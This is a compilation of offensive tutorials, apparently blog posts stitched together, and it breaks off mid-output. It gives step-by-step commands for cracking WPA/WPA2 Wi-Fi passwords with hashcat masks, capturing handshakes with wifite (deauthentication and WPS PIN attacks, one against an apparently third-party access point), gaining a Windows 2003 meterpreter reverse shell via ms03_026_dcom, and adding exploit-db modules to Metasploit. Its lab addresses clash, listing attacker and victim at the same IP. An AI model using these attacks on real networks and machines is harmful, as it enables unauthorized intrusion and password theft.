CRACKING WiFi WPA WPA2 WITH HASHCAT ON KALI LINUX (BRUTEFORCE MASK BASED ATTACK ON WIFI PASSWORDS)

Cracking WPA WPA2 with Hashcat oclHashcat or cudaHashcat on Kali Linux (BruteForce MASK based attack on Wifi passwords)

cudaHashcat or oclHashcat or Hashcat on Kali Linux got built-in capabilities to attack and decrypt or crack WPA WPA2 handshake.cap files. Only constraint is, you need to convert a .cap file to a.hccap file format. This is rather easy.

Important Note: Many users try to capture with network cards that are not supported. You should purchase a card that supports Kali Linux including injection and monitor mode etc. A list can be found in802.11 Recommended USB Wireless Cards for Kali Linux. It is very important that you have a supported card, otherwise you’ll be just wasting time and effort on something that just won’t do the job.
[toc]

My Setup

I have a NVIDIA GTX 210 Graphics card in my machine running Kali Linux 1.0.6 and will use rockyou dictionary for most of the exercise. In this post, I will show How to crack WPA/WPA2 handshake file (.cap files) with cudaHashcat or oclHashcat or Hashcat on Kali Linux.

I will use cudahashcat command because I am using a NVIDIA GPU. If you’re using AMD GPU, then I guess you’ll be using oclHashcat. Let me know if this assumptions is incorrect.

Why use Hashcat to crack WPA/WPA2 handshake file?

Pyrit is the fastest when it comes to cracking WPA/WPA2 handshake files. So why are we using Hashcat to crack WPA/WPA2 handshake files?

1. Because we can?
2. Because Hashcat allows us to use customized attacks with predefined rules and Masks.

Now this doesn’t explain much and reading HASHCAT Wiki will take forever to explain on how to do it. I’ll just give some examples to clear it up.

Hashcat allows you to use the following built-in charsets to attack a WPA/WPA2 handshake file.

Built-in charsets

?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?s = !”#$%&'()*+,-./:;⇔?@[]^_`{|}~

?a = ?l?u?d?s

Numbered passwords

So lets say you password is 12345678. You can use a custom MASK like ?d?d?d?d?d?d?d?d

What it means is that you’re trying to break a 8 digit number password like 12345678 or 23456789 or 01567891.. You get the idea.

Letter passwords – All uppercase

If your password is all letters in CAPS such as: ABCFEFGH orLKHJHIOP or ZBTGYHQS ..etc. then you can use the following MASK:

?u?u?u?u?u?u?u?u

It will crack all 8 Letter passwords in CAPS.

Letter passwords – All lowercase

If your password is all letters in lowercase such as: abcdefgh ordfghpoiu or bnmiopty..etc. then you can use the following MASK:

?l?l?l?l?l?l?l?l

It will crack all 8 Letter passwords in lowercase. I hope you now know where I am getting at.

Passwords – Lowercase letters and numbers

If you know your password is similar to this: a1b2c3d4 or p9o8i7u6or n4j2k5l6 …etc. then you can use the following MASK:

?l?d?l?d?l?d?l?d

Passwords – Uppercase letters and numbers

If you know your password is similar to this: A1B2C3D4 or P9O8I7U6or N4J2K5L6 …etc. then you can use the following MASK:

?u?d?u?d?u?d?u?d

Passwords – Mixed matched with uppercase, lowercase, number and special characters.

If you password is all random, then you can just use a MASK like the following:

?a?a?a?a?a?a?a?a

Note: ?a represents anything …. I hope you’re getting the idea.

If you are absolutely not sure, you can just use any of the predefined MASKs file and leave it running. But yeah, come back to check in a million years for a really long password …. Using a dictionary attack might have more success in that scenario.

Passwords – when you know a few characters

If you somehow know the few characters in the password, this will make things a lot faster. For every known letter, you save immense amount of computing time. MASK’s allows you to combine this. Let’s say your 8 character password starts with abc, doesn’t contain any special characters. Then you can create a MASK rule file to contain the following:

abc?l?l?l?l?l
abc?u?u?u?u?u
abc?d?d?d?d?d
abc?l?u??d??d?l
abc?d?d?l?u?l

There will be 125 combinations in this case. But it will surely break it in time. This is the true power of using cudaHashcat or oclHashcat or Hashcat on Kali Linux to break WPA/WPA2 passwords.

You can even up your system if you know how a person combines a password. Some people always uses UPPERCASE as the first character in their passwords, few lowercase letters and finishes with numbers.

Example: Abcde123

Your mask will be:

?u?l?l?l?l?d?d?d

This will make cracking significantly faster. Social engineering is the key here.

That’s enough with MASK’s. Now let’s capture some WPA/WPA2 handshake files.

Capture handshake with WiFite

Why WiFite instead of other guides that uses Aircrack-ng? Because we don’t have to type in commands..

Type in the following command in your Kali Linux terminal:

wifite –wpa

You could also type in

wifite wpa2

If you want to see everything, (wep, wpa or wpa2, just type the following command. It doesn’t make any differences except few more minutes

wifite

Once you type in following is what you’ll see.

So, we can see bunch of Access Points (AP in short). Always try to go for the ones with CLIENTS because it’s just much faster. You can choose all or pick by numbers. See screenshot below

Awesome, we’ve got few with clients attached. I will pick 1 and 2 cause they have the best signal strength. Try picking the ones with good signal strength. If you pick one with poor signal, you might be waiting a LONG time before you capture anything .. if anything at all.

So I’ve picked 1 and 2. Press Enter to let WiFite do it’s magic.

Once you press ENTER, following is what you will see. I got impatient as the number 1 choice wasn’t doing anything for a LONG time. So I pressed CTRL+C to quit out of it.

This is actually a great feature of WIfite. It now asks me,

What do you want to do?

1. [c]ontinue attacking targets
2. [e]xit completely.

I can type in c to continue or e to exit. This is the feature I was talking about. I typed c to continue. What it does, it skips choice 1 and starts attacking choice 2. This is a great feature cause not all routers or AP’s or targets will respond to an attack the similar way. You could of course wait and eventually get a respond, but if you’re just after ANY AP’s, it just saves time.

And voila, took it only few seconds to capture a handshake. This AP had lots of clients and I managed to capture a handshake.

This handshake was saved in /root/hs/BigPond_58-98-35-E9-2B-8D.cap file.

Once the capture is complete and there’s no more AP’s to attack, Wifite will just quit and you get your prompt back.

Now that we have a capture file with handshake on it, we can do a few things.

Cleanup your cap file using wpaclean

Next step will be converting the .cap file to a format cudaHashcat or oclHashcat or Hashcat on Kali Linux will understand.

Here’s how to do it:

To convert your .cap files manually in Kali Linux, use the following command

wpaclean <out.cap> <in.cap>

Please note that the wpaclean options are the wrong way round. <out.cap> <in.cap> instead of <in.cap> <out.cap> which may cause some confusion.

In my case, the command is as follows:

wpaclean hs/out.cap hs/BigPond_58-98-35-E9-2B-8D.cap

Convert .cap file to .hccap format

We need to convert this file to a format cudaHashcat or oclHashcat or Hashcat on Kali Linux can understand.

To convert it to .hccap format with “aircrack-ng” we need to use the -J option

aircrack-ng <out.cap> -J <out.hccap>

Note the -J is a capitol J not lower case j.

In my case, the command is as follows:

aircrack-ng hs/out.cap -J hs/out

Cracking WPA/WPA2 handshake with Hashcat

cudaHashcat or oclHashcat or Hashcat on Kali Linux is very flexible, so I’ll cover two most common and basic scenarios:

1. Dictionary attack
2. Mask attack

Dictionary attack

Grab some Wordlists, like Rockyou.

Read this guide Cracking Wifi WPA/WPA2 passwords using pyrit cowpatty in Kali Linux for detailed instructions on how to get this dictionary file and sorting/cleaning etc.

First we need to find out which mode to use for WPA/WPA2 handshake file. I’ve covered this in great length in Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linuxguide. Here’s a short rundown:

cudahashcat --help | grep WPA

So it’s 2500.

Now use the following command to start the cracking process:

cudahashcat -m 2500 /root/hs/out.hccap /root/rockyou.txt

Bingo, I used a common password for this Wireless AP. Took me few seconds to crack it. Depending on your dictionary size, it might take a while.

You should remember, if you’re going to use Dictionary attack, Pyrit would be much much much faster than cudaHashcat or oclHashcat or Hashcat. Why we are showing this here? Cause we can. 🙂

Another guide explains how this whole Dictionary attack works. I am not going to explain the same thing twice here. Read Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux for dictionary related attacks in full length.

Brute-Force Attack

Now this is the main part of this guide. Using Brute Force MASK attack.

To crack WPA WPA2 handshake file using cudaHashcat or oclHashcat or Hashcat, use the following command:

Sample:

cudahashcat -m 2500 -a 3 capture.hccap ?d?d?d?d?d?d?d?d

Where -m = 2500 means we are attacking a WPA/WPA2 handshake file.

-a = 3 means we are using Brute Force Attack mode (this is compatible with MASK attack).

capture.hccap = This is your converted .cap file. We generated it using wpaclean and aircrack-ng.

?d?d?d?d?d?d?d?d = This is your MASK where d = digit. That means this password is all in numbers. i.e. 7896435 or 12345678etc.

I’ve created a special MASK file to make things faster. You should create your own MASK file in similar way I explained earlier. I’ve saved my file in the following directory as blackmoreops-1.hcmask.

/usr/share/oclhashcat/masks/blackmoreops-1.hcmask

Do the following to see all available default MASK files provided by cudaHashcat or oclHashcat or Hashcat:

ls /usr/share/oclhashcat/masks/

In my case, the command is as follows:

cudahashcat -m 2500 -a 3 /root/hs/out.hccap  /usr/share/oclhashcat/masks/blackmoreops-1.hcmask

Sample .hcmask file

You can check the content of a sample .hcmask file using the following command:

tail -10 /usr/share/oclhashcat/masks/8char-1l-1u-1d-1s-compliant.hcmask

Edit this file to match your requirement, run Hashcat or cudaHashcat and let it rip.

Location of Cracked passwords

Hashcat or cudaHashcat saves all recovered passwords in a file. It will be in the same directory you’ve ran Hashcat or cudaHashcat or oclHashcat. In my case, I’ve ran all command from my home directory which is /root directory.

cat hashcat.pot

802.11 Recommended USB Wireless Cards for Kali Linux

This post lists some of the best performing, supported and recommended USB Wireless Cards for Kali Linux.

There isn’t a “best” card. There is whatever is right for YOU.

Following recommended USB Wireless cards appears to be working for Kali Linux (i.e. monitor, injection etc.)

*Note* These are not in any type of order *Note*

A common problem in pentest distro such as Kali or BackTrack Linux is when users trying to use a card which is not supported or there just isn’t a supported driver. Most of the following cards are priced below $50USD and they take care of a massive headache and saves time to troubleshoot driver issues rather than investing time to actually do something. With each update these makeshift fixes seems to break old drivers and you end up doing the whole thing again and again. Following guide generated a lot of emails and personal request where users were not able to make it work properly just because their Wifi card wasn’t listed in the recommended wireless cards for Kali Linux.

2.4GHz

 

Rokland N3

~ http://store.rokland.com/products/th…b-for-macs-pcs

$32.97 off Rockland

• Ralink RT3070 ~ http://wikidevi.com/wiki/Rokland_n3
• 700 mW
• Detachable antenna (RP-SMA)
• IEEE 802.11b/g/n
• 150Mbps
• WEP, WPA/WPA2, WPS
• USB 2.0

 

Alfa AWUS036NHA

~ http://www.alfa.com.tw/products_show.php?pc=34&ps=20

$32.99 off Amazon

• Atheros AR9271 ~ http://wikidevi.com/wiki/ALFA_Network_AWUS036NHA
• ~800 mW (29dBm)
• Detachable antenna (RP-SMA)
• IEEE 802.11b/g/n
• 150Mbps
• WEP, WPA/WPA2, WPS
• USB 2.0

 

TP-Link WN722N

~ http://uk.tp-link.com/products/detai…TL-WN722N#spec

$15.18 off Amazon

• Atheros AR9002U ~ http://wikidevi.com/wiki/TP-LINK_TL-WN722N
• 500 mW ?
• Detachable antenna (RP-SMA)
• IEEE 802.11b/g/n
• 150Mbps
• WEP, WPA/WPA2, WPS
• USB 2.0

 

Linksys WUSB54GC v1

~ http://support.linksys.com/en-us/support/adapters/WUSB54GC

25.00$ off Amazon

• Chipset: Ralink 2573 USB ~ https://wikidevi.com/wiki/Linksys_WUSB54GC_v1
• Driver: rt73usb
• IEEE 802.11b/g
• 150Mbps
• WEP, WPA/WPA2, WPS
• USB 2.0
• Stack: mac80211
• Injection: Yes
• See discussion here:

 

5GHz (& 2.4GHz)

 

Rosewill RNX-N600UBE

~ http://www.rosewill.com/products/182…ifications.htm

$32.66 off Amazon

• Ralink RT3572 ~ http://wikidevi.com/wiki/Rosewill_RNX-N600UBE
• 100 mW ?
• Detachable antenna (SMA)
• IEEE 802.11a/b/g/n
• 300Mbps
• WEP, WPA/WPA2, WPS
• USB 2.0

 

Other useful links

• http://www.aircrack-ng.org/doku.php?id=install_drivers
• http://aircrack-ng.blogspot.co.uk/20…tbook-for.html

As the price will change over time and from country to country, it’s missing on purpose. Places that have been known to stock the mentioned cards:

• Amazon
• eBay
• Google Shopping
• Local PC shop
• NewEgg

If you have a different card feel free to share here which will probably help another user someday.

Side Note:

I’ve compiled a small list (These are the only 8 laptops that I could find to match my personal choices) that are Linux compatible and have NVIDIA GeForce Graphics cards. (I’ve tried to avoid AMD/ATI as there’s been some inconsistency lately with their Linux proprietary drivers and heating issues, sorry AMD, take Linux users more seriously next time). NVIDIA seems more stable and gives you more options … Feel free to check this list and add comments about which one you have or prefer…

 

“No responsibility is taken for the correctness of this information.” == Double check before purchasing.

 

Conclusion

or maybe you would like to turn a Kindle Device in your Portable Kali installation ? The possibilities are endless …

HOW TO HACK WINDOWS 2003 SERVER WITH METASPLOIT

This is a a detailed step by step guide on How to pentest Remote PC (Windows 2003 server) with Metasploits. I’ve used BackTrack 5 and Windows 2003 server in a virtual environment. The ease of pentesting is scary and readers, sysadmins are advised to update their Windows 2003 server to the latest patch/service pack and use additional antivirus, firewalls to protect them from similar situation. The author takes no responsibility on how this tutorial is being used by readers and this is for educational purpose only.

Introduction

Metasploit is simple to use and is designed with ease-of-use in mind to aid Penetration Testers.
I will be taking you through this demo in BackTrack 5 R3, so go ahead and download that if you don’t already have it:

http://www.backtrack-linux.org/downloads/

The reason for using BackTrack 5 R3 is because it has the correct Ruby Libraries.

Metasploit framework has three work environments,

1. The msfconsole,
2. The msfcli interface and
3. The msfweb interface.

However, the primary and the most preferred work area is the‘msfconsole’. It is an efficient command-line interface that has its own command set and environment system.
Metasploit quick guide

Before executing your exploit, it is useful to understand what some Metasploit commands do. Below are some of the commands that you will use most. Graphical explanation of their outputs would be given as and when we use them while exploiting some boxes in later part of the article.

1. search : Typing in the command ‘search’ along with the keyword lists out the various possible exploits that have that keyword pattern.
2. show exploits : Typing in the command ‘show exploits‘ lists out the currently available exploits. There are remote exploits for various platforms and applications including Windows, Linux, IIS, Apache, and so on, which help to test the flexibility and understand the working of Metasploit.
3. show payloads : With the same ‘show‘ command, we can also list the payloads available. We can use a ‘show payloads’ to list the payloads.
4. show options : Typing in the command ‘show options‘ will show you options that you have set and possibly ones that you might have forgotten to set. Each exploit and payload comes with its own options that you can set.
5. info : If you want specific information on an exploit or payload, you are able to use the ‘info’ command. Let’s say we want to get complete info of the payload ‘winbind’. We can use ‘info payload winbind‘.
6. use : This command tells Metasploit to use the exploit with the specified name
7. set RHOST : This command will instruct Metasploit to target the specified remote host.
8. set RPORT : This command sets the port that Metasploit will connect to on the remote host.
9. set PAYLOAD : This command sets the payload that is used to a generic payload that will give you a shell when a service is exploited.
10. set LPORT : This command sets the port number that the payload will open on the server when an exploit is exploited. It is important that this port number be a port that can be opened on the server (i.e.it is not in use by another service and not reserved for administrative use), so set it to a random 4 digit number greater than 1024, and you should be fine. You’ll have to change the number each time you successfully exploit a service as well.
11. exploit : Actually exploits the service. Another version of exploit,rexploit reloads your exploit code and then executes the exploit. This allows you to try minor changes to your exploit code without restarting the console
12. help : The ‘help’ command will give you basic information of all the commands that are not listed out here.

Now that you are ready with all the basic commands you need to launch your exploit. Let’s choose a couple of scenarios to get control of a remotely connected machine.

Lab Setup:

Victim Machine
OS: Microsoft Windows Server 2003
IP: IP: 192.168.42.128

Attacker (Our) Machine
OS: BackTrack 5 R3
Kernel version: Linux bt 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
Metasploit Version: Built in version of metasploit 3.8.0-dev
IP: 192.168.42.128

Objective

The only information provided to us about the remote server is that it is a Windows 2003 Server and the Objective is to gain shell access of this remote server.

Detailed Steps

Step 1 – Scan with nmap for open ports

Perform an nmap scan of the remote server 192.168.42.129.
The output of the nmap scan shows us a range of ports open which can be seen below in Figure 1.

Figure 1

We notice that there is port 135 open. Thus we can look for scripts in Metasploit to exploit and gain shell access if this server is vulnerable.

Step 2 – Open msfconsole

In your copy of BackTrack, go to:
Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole

Figure 2

During the initialization of msfconsole, standard checks are performed. If everything works out fine we will see the display as shown in Figure 3.

Figure 3

Step 3 – Search RPC exploit in Metasploit

Now, we know that port 135 is open so, we search for a related RPC exploit in Metasploit.
To list out all the exploits supported by Metasploit we use the “show exploits” command. This exploit lists out all the currently available exploits and a small portion of it is shown below in Figure 4.

Figure 4

As you may have noticed, the default installation of the Metasploit Framework 3.8.0-dev comes with 696 exploits and 224 payloads, which is quite an impressive stockpile thus finding a specific exploit from this huge list would be a real tedious task. So, we use a better option. You can either visit the link http://metasploit.com/modules/or another alternative would be to use the “search” command in Metasploit to search for related exploits for RPC.
In msfconsole type “search dcerpc” to search all the exploits related todcerpc keyword as that exploit can be used to gain access to the server with a vulnerable port 135. A list of all the related exploits would be presented on the msfconsole window and this is shown below in Figure 5.

Figure 5

Step 4 – Gather info about target exploit

Now that you have the list of rpc exploits in front of you, we would need more information about the exploit before we actually use it. To get more information regarding the exploit you can use the command “info exploit/windows/dcerpc/ms03_026_dcom” which provides information such as available targets, exploit requirements, details of vulnerability itself, and even references where you can find more information. This is shown in Figure 6.

Figure 6

Step 5 – Activate exploit

The command “use” activates the exploit environment for the exploit. In our case we would use the command “use exploit/windows/dcerpc/ms03_026_dcom” to activate our exploit.

Figure 7

From the above figure it is noticed that, after the use of the exploit “exploit/windows/dcerpc/ms03_026_dcom” the prompt changes from “msf>” to “msf exploit(ms03_026_dcom) >” which symbolizes that we have entered a temporary environment of that exploit.

Step 6 – Configure exploit

Now, we need to configure the exploit as per the need of the current scenario. The “show options” command displays the various parameters which are required for the exploit to be launched properly. In our case, the RPORT is already set to 135 and the only option to be set is RHOST which can be set using the “set RHOST” command.
We enter the command “set RHOST 192.168.42.129” and we see that the RHOST is set to 192.168.42.129

Figure 8

Step 7 – Set payload for exploit

The only step remaining now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the “show payloads” command.
As shown in the below figure, “show payloads” command will list all payloads that are compatible with the selected exploit.

Figure 9

For our case, we are using the reverse tcp meterpreter which can be set using the command, “set PAYLOAD windows/meterpreter/reverse_tcp” which spawns a shell if the remote server is successfully exploited. Now again you must view the available options using “show options” to make sure all the compulsory sections are properly filled so that the exploit is launched properly

Figure 10

We notice that the LHOST for out payload is not set, so we set it toout local IP ie. 192.168.42.128 using the command “set LHOST 192.168.42.128“

Step 8 – Launch exploit and establish connection

Now that everything is ready and the exploit has been configured properly it’s time to launch the exploit.

You can use the “check” command to check whether the victim machine is vulnerable to the exploit or not. This option is not present for all the exploits but can be a real good support system before you actually exploit the remote server to make sure the remote server is not patched against the exploit you are trying against it.

In out case as shown in the Figure below, our selected exploit does not support the check option.

Figure 11

The “exploit” command actually launches the attack, doing whatever it needs to do to have the payload executed on the remote system.

Figure 12

The above figure shows that the exploit was successfully executed against the remote machine 192.168.42.129 due to the vulnerable port 135.

This is indicated by change in prompt to “meterpreter >“.

Step 9 – Perform an action on pentested server

Now that a reverse connection has been setup between the victim and our machine, we have complete control of the server.

We can use the “help“ command to see which all commands can be used by us on the remote server to perform the related actions as displayed in the below Figure.

Below are the results of some of the meterpreter commands.

Figure 13

Add new exploits to Metasploit from Exploit-db

All this timeAll this time you were just using mainstream exploits which were famous but old. They worked well, but only with old unpatched operating systems, not the updated ones. Now it’s time to move on to the next step. Our poor experience against Windows 8 and Java 7u60 left us shattered, and we realized that fully patched and updated machines with strong antivirus and firewall can be pretty  hard to break into. Now we will move into the world of real pentesting, and the first step would be introduction to exploit-db.

Exploit-db

As usual, a few official words from the developers before I express my personal views.

The Exploit Database is the ultimate archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers. Its aim is to serve as the most comprehensive collection of exploits gathered through direct submissions, mailing lists, and other public sources, and present them in a freely-available and easy-to-navigate database. The Exploit Database is a repository for exploits and proof-of-concepts rather than advisories, making it a valuable resource for those who need actionable data right away. (offensive security)

Some more

The Exploit Database is a CVE-Compatible Database and (where applicable) CVE numbers are assigned to the individual exploit entries in the database. The public database archive does not contain the mapped CVE numbers, but we make them available to our partnering organizations, making links to The Exploit Database entries available within their products.

As many exploit developers lament, it is frequently more difficult to locate a vulnerable application than it is to take a public proof of concept and change it into a working exploit. For this reason, The Exploit Database also hosts the vulnerable application versions whenever possible.

In addition, the team of volunteers that maintain the site also make every effort to verify the submitted exploits and a visual indicator is provided whether or not a successful verification was performed. (Offensive Security)

Now, what exploit db really is, is nothing more than a database where the pentestors who write an exploit for a vulnerability upload the source code of the exploit of other pentestors too see. It is maintained by Offensive Security (the force behind Backtrack, Kali, Metasploit Unleashed). The exploit-db.com site itself is pretty easy to navigate, and you can find all sorts of exploits there. Just finding an exploit, however, is not enough, as you need to add it to Metasploit in order to use it. 

Adobe Flash Player Shader Buffer Overflow

This module exploits a buffer overflow vulnerability in Adobe Flash Player. The vulnerability occurs in the flash.Display.Shader class, when setting specially crafted data as its bytecode, as exploited in the wild in April 2014. This module has been tested successfully on IE 6 to IE 11 with Flash 11, Flash 12 and Flash 13 over Windows XP SP3, Windows 7 SP1 and Windows 8. (rapid7)

Now the site suggest that the exploit can be found here.

exploit/windows/browser/adobe_flash_pixel_bender_bof

But using the command

use exploit/windows/browser/adobe_flash_pixel_bender_bof

shows that the exploit is not in Metasploit yet (chances are good it’s there if you update metasploit regularly or if you are reading this tutorial a long time after it was written. Either ways, the method will not differ even if the exploit is already there, so don’t worry. Also you can use a different exploit as per your liking, and just replace the name wherever you see it being used in commands)

Now, there are two alternates. First, update the metasploit framework using 

 

msfupdate

This will update the framework with new modules.

The second alternate the to download the exploit from exploit-db, then put it in the ~/.msf4/modules/exploit/<your_folder> directory. Any exploit put here will be detected my Metasploit when it starts. It will show up when you type use /exploit/your_folder/exploit_name. An important point here is while the <your_folder is arbitrary  and can be set to any value, it is recommended to use a proper directory structure. For example, this exploit should be placed in~/.msf4/modules/exploit/windows/browser/ directory .Also, it is mandatory to place exploits in a subdirectory of ~/.msf4/modules/exploit/ or you won’t be able to use it. For newbies in Linux, here is a detailed step by step guide.

Get the exploit

For examples sake, we’ll use the adobe shader exploit from http://www.exploit-db.com/exploits/33333/ Click on the Save icon to download the exploit. Save it on you Kali Desktop.

.msf4 directory method

Now if you are not well versed with linux, you will need help with creating the directory and placing files there. Although I’m guiding you how to do it, you should be proficient in linux usage and should be able to do the basic stuff like this atleast. So, you can either use the command to line create the directories or do it using the GUI.

Command line method

First, say hi to mkdir

mkdir –help
Usage: mkdir [OPTION]… DIRECTORY…
Create the DIRECTORY(ies), if they do not already exist.

Mandatory arguments to long options are mandatory for short options too.
  -m, –mode=MODE   set file mode (as in chmod), not a=rwx – umask
  -p, –parents     no error if existing, make parent directories as needed
  -v, –verbose     print a message for each created directory
  -Z, –context=CTX  set the SELinux security context of each created
                      directory to CTX
      –help     display this help and exit
      –version  output version information and exit

First we’ll move to the already existent directory using (you need to be in root directory for this to work. Type just cd if unsure, it will automatically take you to root directory)root@kali:~# cd .msf4/modules/    
To see what the directory has, execute ls. It will return nothing as the directory is empty.

root@kali:~/.msf4/modules# ls

Now we’ll use mkdir to create what we need.

root@kali:~/.msf4/modules# mkdir exploits

root@kali:~/.msf4/modules# cd exploits

root@kali:~/.msf4/modules/exploits# mkdir windows        

root@kali:~/.msf4/modules/exploits# cd windows

root@kali:~/.msf4/modules/exploits/windows# mkdir browser

root@kali:~/.msf4/modules/exploits/windows# cp      

If you read the mkdir help thing, you might have noticed the -p option. It makes everything much easier. Everything above can be achieved with something as simple as

root@kali:~# mkdir -p ~/.msf4/modules/exploits/windows/browser

Now meet cp

root@kali:~/.msf4/modules/exploits/windows# cp –help

Usage: cp [OPTION]… [-T] SOURCE DEST

  or:  cp [OPTION]… SOURCE… DIRECTORY

  or:  cp [OPTION]… -t DIRECTORY SOURCE…

Copy SOURCE to DEST, or multiple SOURCE(s) to DIRECTORY.

Assume you have adobe_flash_pixel_bender_bof.rb file on your desktop. Then use the following commands.

root@kali:~/Desktop# cp adobe_flash_pixel_bender_bof.rb ~/.msf4/modules/exploits/windows

root@kali:~# ls 

Desktop  app.apk

root@kali:~# cd Desktop

root@kali:~/Desktop# cp adobe_flash_pixel_bender_bof.rb ~/.msf4/modules/exploits/windows/browser

Now check for yourself

root@kali:~# cd ~/.msf4/modules/exploits/windows/browser

root@kali:~/.msf4/modules/exploits/windows/browser# ls

adobe_flash_pixel_bender_bof.rb

GUI Method

Go to computer -> Filesystem->Home. Now you won’t see .msf4 there, because the . prefix is for hidden files. So go to view and select show hidden items. Now it will be visible.

Now the rest is going to be a piece of cake. Copy the exploit from desktop, and create the directories by using the easy peasy right click -> New folder method. After that just paste the file where it needs to be. You’ll be done. Now start msfconsole again or type reload_all to reload the module. This will add the module to metasploit and you can use it as you normally would.

Hack WiFi WPA-2 PSK Capturing the Handshake

WPA password hacking

Okay, so hacking WPA-2 PSK involves 2 main steps-

1. Getting a handshake (it contains the hash of password, i.e. encrypted password)
2. Cracking the hash.

Now the first step is conceptually easy. What you need is you, the attacker, a client who’ll connect to the wireless network, and the wireless access point. What happens is when the client and access point communicate in order to authenticate the client, they have a 4 way handshake that we can capture. This handshake has the hash of the password. Now there’s no direct way of getting the password out of the hash, and thus hashing is a robust protection method. But there is one thing we can do. We can take all possible passwords that can exists, and convert them to hash. Then we’ll match the hash we created with the one that’s there in the handshake. Now if the hashes match, we know what plain text password gave rise to the hash, thus we know the password. If the process sounds really time consuming to you, then its because it is. WPA hacking (and hash cracking in general) is pretty resource intensive and time taking process. Now there are various different ways cracking of WPA can be done. But since WPA is a long shot, we shall first look at the process of capturing a handshake. We will also see what problems one can face during the process (I’ll face the problems for you). Also, before that, some optional wikipedia theory on what a 4-way handshake really is (you don’t want to become a script kiddie do you?)

The Four-Way Handshake

The authentication process leaves two considerations: the access point (AP) still needs to authenticate itself to the client station (STA), and keys to encrypt the traffic need to be derived. The earlier EAP exchange or WPA2-PSK has provided the shared secret key PMK (Pairwise Master Key). This key is, however, designed to last the entire session and should be exposed as little as possible. Therefore the four-way handshake is used to establish another key called the PTK (Pairwise Transient Key). The PTK is generated by concatenating the following attributes: PMK, AP nonce (ANonce), STA nonce (SNonce), AP MAC address, and STA MAC address. The product is then put through PBKDF2-SHA1 as the cryptographic hash function.
The handshake also yields the GTK (Group Temporal Key), used to decrypt multicast and broadcast traffic. The actual messages exchanged during the handshake are depicted in the figure and explained below:

1. The AP sends a nonce-value to the STA (ANonce). The client now has all the attributes to construct the PTK.
2. The STA sends its own nonce-value (SNonce) to the AP together with a MIC, including authentication, which is really a Message Authentication and Integrity Code: (MAIC).
3. The AP sends the GTK and a sequence number together with another MIC. This sequence number will be used in the next multicast or broadcast frame, so that the receiving STA can perform basic replay detection.
4. The STA sends a confirmation to the AP.

All the above messages are sent as EAPOL-Key frames.
As soon as the PTK is obtained it is divided into five separate keys:
PTK (Pairwise Transient Key – 64 bytes)

1. 16 bytes of EAPOL-Key Confirmation Key (KCK)– Used to compute MIC on WPA EAPOL Key message
2. 16 bytes of EAPOL-Key Encryption Key (KEK) – AP uses this key to encrypt additional data sent (in the ‘Key Data’ field) to the client (for example, the RSN IE or the GTK)
3. 16 bytes of Temporal Key (TK) – Used to encrypt/decrypt Unicast data packets
4. 8 bytes of Michael MIC Authenticator Tx Key – Used to compute MIC on unicast data packets transmitted by the AP
5. 8 bytes of Michael MIC Authenticator Rx Key – Used to compute MIC on unicast data packets transmitted by the station

The Michael MIC Authenticator Tx/Rx Keys provided in the handshake are only used if the network is using TKIP to encrypt the data.


 By the way, if you didn’t understand much of it then don’t worry. There’s a reason why people don’t  search for hacking tutorials on Wikipedia (half the stuff goes above the head)

Capturing The Handshake

Now there are several (only 2 listed here) ways of capturing the handshake. We’ll look at them one by one-

1. Wifite (easy and automatic)
2. Airodump-ng (easy but not automatic, you manually have to do what wifite did on its own)

Wifite

Methodology

We’ll go with the easy one first. Now you need to realize that for a handshake to be captured, there needs to be a handshake. Now there are 2 options, you could either sit there and wait till a new client shows up and connects to the WPA network, or you can force the already connected clients to disconnect, and when they connect back, you capture their handshake. Now while other tutorials don’t mention this, I will (such a good guy I am 🙂 ). Your network card is good at receiving packets, but not as good in creating them. Now if your clients are very far from you, your deauth requests (i.e. please get off this connection request) won’t reach them, and you’ll keep wondering why you aren’t getting any handshake (the same kind of problem is faced during ARP injection and other kind of attacks too). So, the idea is to be as close to the access point (router) and the clients as possible. Now the methodology is same for wifite and airodump-ng method, but  wifite does all this crap for you, and in case of airodump-ng, you’ll have to call a brethren (airreply-ng) to your rescue. Okay enough theory.

Get the handshake with wifite

Now my configuration here is quite simple. I have my cellphone creating a wireless network named ‘me’ protected with wpa-2. Now currently no one is connected to the network. Lets try and see what wifite can do.

root@kali:~# wifite
.;’                     `;,
.;’  ,;’             `;,  `;,   WiFite v2 (r85)
.;’  ,;’  ,;’     `;,  `;,  `;,
::   ::   :   ( )   :   ::   ::  automated wireless auditor
‘:.  ‘:.  ‘:. /_ ,:’  ,:’  ,:’
‘:.  ‘:.    /___    ,:’  ,:’   designed for Linux
‘:.       /_____      ,:’
/      

[+] scanning for wireless devices…
[+] enabling monitor mode on wlan0… done
[+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
[0:00:04] scanning wireless networks. 0 targets and 0 clients found

[+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
— ——————–  —  —-  —–  —-  ——
1  me                     1  WPA2  57db   wps
2  *******              11  WEP   21db    no   client
3  **************   11  WEP   21db    no

Now as you can see, my network showed up as ‘me’. I pressed ctrl+c and wifite asked me which target to attack (the network has wps enabled. This is an added bonus, reaver can save you from all the trouble. Also, wifite will use reaver too to skip the whole WPA cracking process and use a WPS flaw instead. We have a tutorial on hacking WPA WPS using Reaver already, in this tutorial we’ll forget that this network has WPS and capture the handshake instead)
[+] select target numbers (1-3) separated by commas, or ‘all’: 
Now I selected the first target,  i.e. me. As expected, it had two attacks in store for us. First it tried the PIN guessing attack. It has almost 100% success rate, and would have given us the password had I waited for 2-3 hours. But I pressed ctrl+c and it tried to capture the handshake. I waited for 10-20 secs, and then pressd ctrl+c. No client was there so no handshake could be captured. Here’s what happened.

[+] 1 target selected.
[0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:24] WPS attack, 0/0 success/ttl,
(^C) WPS brute-force attack interrupted
[0:08:20] starting wpa handshake capture on “me”
[0:08:05] listening for handshake…
(^C) WPA handshake capture interrupted
[+] 2 attacks completed:
